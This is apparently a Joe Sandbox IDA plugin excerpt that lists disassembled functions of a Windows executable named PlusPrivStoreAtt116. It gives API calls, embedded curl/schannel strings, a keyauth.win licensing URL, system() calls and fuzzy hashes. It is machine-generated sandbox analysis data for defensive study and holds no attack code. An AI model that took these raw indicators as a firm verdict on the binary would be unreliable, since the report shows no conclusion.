                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: schannel: ApplyControlToken failure: %s$schannel: failed to send close msg: %s (bytes written: %zd)$schannel: shutting down SSL/TLS connection with %s port %hu
                                        • API String ID: 1294909896-116363806
                                        • Opcode ID: 72219bcd79702ef453e5b09d7ccea601ae3333a927f190b2508ed3d9f268aa05
                                        • Instruction ID: 4b2708467bafa7b7afa8168c2f0e43b955dbb0a49a02fea2528c904e8855e6d4
                                        • Opcode Fuzzy Hash: 72219bcd79702ef453e5b09d7ccea601ae3333a927f190b2508ed3d9f268aa05
                                        • Instruction Fuzzy Hash: 5D914936A08F8586EB10CF26D8906AE3BB4FB88B99F640535CE4D87765DF78D445CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freemallocmemcpy
                                        • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                        • API String ID: 3056473165-3891197721
                                        • Opcode ID: b41d35e93228481b9e361a5bb19d82a80a1a014f54a5c8932dc0e415742b1979
                                        • Instruction ID: d2a02be3c55e65f92ef52830496cfbf8e2854970832e467324e8f3a9903183cb
                                        • Opcode Fuzzy Hash: b41d35e93228481b9e361a5bb19d82a80a1a014f54a5c8932dc0e415742b1979
                                        • Instruction Fuzzy Hash: D4718E72B05B058AEB10CB66D4506AD3BA5FF48BACF204636DE2D977C5EE78E406C740
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: %s$Connection #%ld to host %s left intact
                                        • API String ID: 1294909896-118628944
                                        • Opcode ID: 7665a385a49b6a18784097a82b69acf71c283a2eb38e737f672b30be921ec6bb
                                        • Instruction ID: 252d1d7b7831b87c950dd54fb515ee0f218a19f42c49829a7b9f45c9b1948c1e
                                        • Opcode Fuzzy Hash: 7665a385a49b6a18784097a82b69acf71c283a2eb38e737f672b30be921ec6bb
                                        • Instruction Fuzzy Hash: BD917632B0868182EB599F6696503FDAB95FF84B88F244935DE4E87756CFBCE450C340
                                        APIs
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C1ACB
                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029C1AE1
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C18FD
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C191A
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C192E
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C194A
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1967
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C198A
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C199E
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19B2
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19D8
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C19EC
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A00
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A4F
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A5C
                                          • Part of subcall function 00007FF6029C1880: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF6029C1F05), ref: 00007FF6029C1A85
                                        • memset.VCRUNTIME140 ref: 00007FF6029C1B15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$memset
                                        • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                        • API String ID: 2717317152-3248832348
                                        • Opcode ID: 7e6886faf88a525474308bef059ca3135f8386d9b2c87476bf9b61c78194a49c
                                        • Instruction ID: 87f7cc7529d0dcd856dbca3ec7accdb31a3cabc83a45f3ebb673ba53825eccc9
                                        • Opcode Fuzzy Hash: 7e6886faf88a525474308bef059ca3135f8386d9b2c87476bf9b61c78194a49c
                                        • Instruction Fuzzy Hash: 5B717D22A0CAC282E751DF26D0503BD2B60EF81F98F784535DA9D8B297DFB8E491C754
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$memcpy
                                        • String ID: 1.1
                                        • API String ID: 4107583993-2150719395
                                        • Opcode ID: 1c4f9d8f6cc8ea222318239ae0d0b33bff5049adf4c60fe77cde5224e2d48f34
                                        • Instruction ID: 7b939c18ed392069efa8225de84d733106ba0e1fc741cddc994c8d0bb0be8730
                                        • Opcode Fuzzy Hash: 1c4f9d8f6cc8ea222318239ae0d0b33bff5049adf4c60fe77cde5224e2d48f34
                                        • Instruction Fuzzy Hash: 52517072A04B8286D768CF22E8403AA7BA4FB48B88F548035DF9D87756DF7CE095D300
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ErrorLastmallocrecvsend
                                        • String ID: Send failure: %s
                                        • API String ID: 25851408-857917747
                                        • Opcode ID: 54a70cbaad24dc1b0fb0ed93030655e83525866fabab26ff7a7e0f2c7e7e2280
                                        • Instruction ID: a582b7081e27e410cf2782abed41bc6552e4e448acbe895f71c843ed0f6b3b29
                                        • Opcode Fuzzy Hash: 54a70cbaad24dc1b0fb0ed93030655e83525866fabab26ff7a7e0f2c7e7e2280
                                        • Instruction Fuzzy Hash: 4141CD76B09B8145EB648F26E85477A6A94AF88FECF240635CEAD87785DE7CE044C700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Resolving timed out after %I64d milliseconds
                                        • API String ID: 1294909896-3343404259
                                        • Opcode ID: 7a53e0a7d55959d416b0add4e115dcd4a29e0269d5a804bffd8908325d408303
                                        • Instruction ID: 319d049317175da56dfc2f0ea80f910d9ea0b8f1fc79164ac4688f9ad75c61c9
                                        • Opcode Fuzzy Hash: 7a53e0a7d55959d416b0add4e115dcd4a29e0269d5a804bffd8908325d408303
                                        • Instruction Fuzzy Hash: 42D1B162A0864285FB268F7A81543FC6BA4FF49B8CF285535CE0D97687DFB8E441C350
                                        APIs
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A28B7
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2927
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2987
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A29D7
                                          • Part of subcall function 00007FF6029A2850: system.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A2A27
                                        • MessageBoxA.USER32 ref: 00007FF6029A3737
                                          • Part of subcall function 00007FF6029A4320: memcpy.VCRUNTIME140(7FFFFFFFFFFFFFFF,https://keyauth.win/api/1.2/,-3333333333333333,00007FF6029A1B59), ref: 00007FF6029A4351
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF6029A379A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: system$Message_invalid_parameter_noinfo_noreturnmemcpy
                                        • String ID: keyauth.win$null
                                        • API String ID: 3545939226-2841560827
                                        • Opcode ID: 3cf097f73151ea5b1f30424f91c2ebea1264c0c5fec36669e049bdd5d7a7ed1d
                                        • Instruction ID: da604fd3882a0f4294acd35cec7d7b025dfc35299a70b4029c7bcc5b13a2650a
                                        • Opcode Fuzzy Hash: 3cf097f73151ea5b1f30424f91c2ebea1264c0c5fec36669e049bdd5d7a7ed1d
                                        • Instruction Fuzzy Hash: DA51CB22E0879186FB04DB66D5593AC2B61EF05B8CFA04135DE4D97B8BCFBC91828384
                                        APIs
                                          • Part of subcall function 00007FF6029C8F70: GetModuleHandleA.KERNEL32(?,?,?,00007FF6029F2DCA,?,?,?,?,00007FF6029C92FB), ref: 00007FF6029C8F84
                                        • GetProcAddressForCaller.KERNELBASE(?,?,?,?,00007FF6029C92FB), ref: 00007FF6029F2DE0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: AddressCallerHandleModuleProc
                                        • String ID: InitSecurityInterfaceA$secur32.dll$security.dll
                                        • API String ID: 2084706301-3788156360
                                        • Opcode ID: 6d94ad0bd16c8c0f11a2579dc9450e7ebb409a251943410b505cb19f3630012d
                                        • Instruction ID: 9f65670bbe8610bf9f91e6492fdd8a5c4a533de1a933e53591edb51433db5209
                                        • Opcode Fuzzy Hash: 6d94ad0bd16c8c0f11a2579dc9450e7ebb409a251943410b505cb19f3630012d
                                        • Instruction Fuzzy Hash: D9F04F65E49B0381FF88DB56A8957B12BA0AF6574CFB40834D80CC2392EEBCA585C300
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: Resolving timed out after %I64d milliseconds
                                        • API String ID: 0-3343404259
                                        • Opcode ID: 543579aadb1d74d10013c36e2f77582ef7459981ea7dede42a3c104d98e4bc4e
                                        • Instruction ID: e224f345219bffd1d03174df73d3621902270a67cb5c1e0f0a3daad596a06b45
                                        • Opcode Fuzzy Hash: 543579aadb1d74d10013c36e2f77582ef7459981ea7dede42a3c104d98e4bc4e
                                        • Instruction Fuzzy Hash: D7B19462A0864285FB668E7B81543BD2BA4FF45B8CF785535CA1E87287DFBDE841C340
                                        APIs
                                        • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029D1CE0
                                          • Part of subcall function 00007FF6029D2270: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029D22CA
                                          • Part of subcall function 00007FF6029D2020: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029D20B8
                                          • Part of subcall function 00007FF6029D2020: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF6029D20C1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free$calloc
                                        • String ID: PROXY %s %s %s %li %li$TCP4$TCP6
                                        • API String ID: 3095843317-1242256665
                                        • Opcode ID: 8b0d76db602b129a0bfce4cbd9b83f6a544ee194d1b84e366e34e96e5543cac2
                                        • Instruction ID: 3a85ca901d0e454f31350290ed15edbd5cc6c1b423cf8a6d852f571717ee4421
                                        • Opcode Fuzzy Hash: 8b0d76db602b129a0bfce4cbd9b83f6a544ee194d1b84e366e34e96e5543cac2
                                        • Instruction Fuzzy Hash: 62419422A0C68686E760DB66E4413FA7FA1AF8578CF244432DA4DC7687DFBCE544DB00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: closesocket$calloc
                                        • String ID:
                                        • API String ID: 2958813939-0
                                        • Opcode ID: 28d21d9544194ec4c8a92fbe0cca9a50be666e2dc753f7074a652fd99a0cf093
                                        • Instruction ID: 0a8d04947bd635c31bc8941090097c4e5c42359268438bdc43d89e92ab171c71
                                        • Opcode Fuzzy Hash: 28d21d9544194ec4c8a92fbe0cca9a50be666e2dc753f7074a652fd99a0cf093
                                        • Instruction Fuzzy Hash: 61418031A08A4281E741EF36D4542E92B65FF88B6CFA44631DE5EC62DBEFBCE5458310
                                        APIs
                                        • memcpy.VCRUNTIME140(?,0000006E00000006,?,FFFFFFFF,00007FF6029A11F9), ref: 00007FF6029B0928
                                        • memcpy.VCRUNTIME140(?,0000006E00000006,?,FFFFFFFF,00007FF6029A11F9), ref: 00007FF6029B09C9
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6029B09E7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: memcpy$Concurrency::cancel_current_task
                                        • String ID:
                                        • API String ID: 326894585-0
                                        • Opcode ID: 66997184731f703451c23791d2a627075896e7fda698d68a4c0cfe32fbc39a11
                                        • Instruction ID: aadb0dcfd12c03306a872d0ed2d87c4cc547b1e61428c93a8d23b4dfa31a9336
                                        • Opcode Fuzzy Hash: 66997184731f703451c23791d2a627075896e7fda698d68a4c0cfe32fbc39a11
                                        • Instruction Fuzzy Hash: 9131EB62F0974645FA159B53E54037E2A409F19BE9F740630DE6D47BC3DEBCA492C340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                                        • API String ID: 0-3791222319
                                        • Opcode ID: 90b4d512fff49a626f0686bc07ab1995a32770a12746a8eb099df0e8d7811198
                                        • Instruction ID: d9999ce4a34219382144fd0c98e2034d8a7eed693c17dd73a040cce79f004beb
                                        • Opcode Fuzzy Hash: 90b4d512fff49a626f0686bc07ab1995a32770a12746a8eb099df0e8d7811198
                                        • Instruction Fuzzy Hash: 5E51A122A0868286EB54DF2795442BD7B90EF54BACF248235DE2DC73D2DEBCE461D300
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: freerecv
                                        • String ID:
                                        • API String ID: 2032557106-0
                                        • Opcode ID: c290df82bec0a9fbd1bba91402cfb6175d957c5f8f370d1a6f1b991630986998
                                        • Instruction ID: 55ffbaa85681eefb66185e29fcc42a5969ea495a107774fff406f349839fb369
                                        • Opcode Fuzzy Hash: c290df82bec0a9fbd1bba91402cfb6175d957c5f8f370d1a6f1b991630986998
                                        • Instruction Fuzzy Hash: FAC1F93260869246EB668F26D1503BA6BA4FF847ACF244235DEAE837C5DF7CF4418700
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: free
                                        • String ID: Connected to %s (%s) port %ld (#%ld)$User-Agent: %s
                                        • API String ID: 1294909896-3248832348
                                        • Opcode ID: 9352cf03e6d1215826af78489c14582c219a9cd389749df62015d38e4eedf361
                                        • Instruction ID: c7da9fda61175d81c652e6464af8aea9362a261a2264f6ba65ba4049d06fad91
                                        • Opcode Fuzzy Hash: 9352cf03e6d1215826af78489c14582c219a9cd389749df62015d38e4eedf361
                                        • Instruction Fuzzy Hash: E3515A62E0CAC281E755CF26D0503A96B60EB84F9CF684531DE8C8B39ADFB8E491C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2631386007.00007FF6029A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6029A0000, based on PE: true
                                        • Associated: 00000000.00000002.2631331636.00007FF6029A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631479271.00007FF602A02000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631509215.00007FF602A19000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2631566516.00007FF602A1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff6029a0000_PlusPrivStoreAtt116.jbxd
                                        Similarity
                                        • API ID: ConsoleSleepTitle_invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 4275364305-0
